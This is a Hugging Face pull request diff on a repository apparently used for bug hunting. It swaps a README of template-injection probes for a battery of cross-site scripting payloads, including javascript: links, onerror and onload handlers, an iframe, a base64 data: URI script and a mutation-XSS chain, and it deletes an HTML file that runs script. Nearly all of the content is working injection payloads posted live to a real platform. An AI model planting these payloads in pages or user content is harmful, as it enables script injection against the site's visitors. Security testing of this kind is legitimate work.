Hugging Face's logo

FIRSTACCOUNT69
/
test-hunt-2

Safetensors
test
Model card Files
xet
Community
5

Test PR

#4
by SECONDACCOUNT69 - opened
base: refs/heads/main
from: refs/pr/4
Discussion Files changed
+14
-11
Files changed (2) hide show
  1. README.md +14 -10
  2. test.html +0 -1
README.md CHANGED
@@ -1,22 +1,26 @@
1
  ---
 
 
2
  license: mit
3
  ---
4
- # SSTI Test
5
 
6
- {@html "<b>bold</b>"}
7
 
8
- {2+2}
9
 
10
- {process.env}
11
 
12
- ${7*7}
13
 
14
- {{7*7}}
15
 
16
- <%= 7*7 %>
17
 
18
- #{7*7}
19
 
20
- ${{7*7}}
21
 
22
- {#if true}visible{/if}
 
 
 
1
  ---
2
+ tags:
3
+ - test
4
  license: mit
5
  ---
6
+ # Test Model
7
 
8
+ [Click me](javascript:alert(1))
9
 
10
+ ![img](x onerror=alert(1))
11
 
12
+ <details><summary>Click</summary><img src=x onerror=alert(document.domain)></details>
13
 
14
+ <iframe src="javascript:alert(1)">
15
 
16
+ <a href="javascript:alert(1)">xss link</a>
17
 
18
+ [link](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)
19
 
20
+ <div onmouseover="alert(1)">Hover me</div>
21
 
22
+ <svg onload="alert(1)">
23
 
24
+ <math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
25
+
26
+ <input onfocus=alert(1) autofocus>
test.html DELETED
@@ -1 +0,0 @@
1
- <html><body><script>document.write(document.domain)</script></body></html>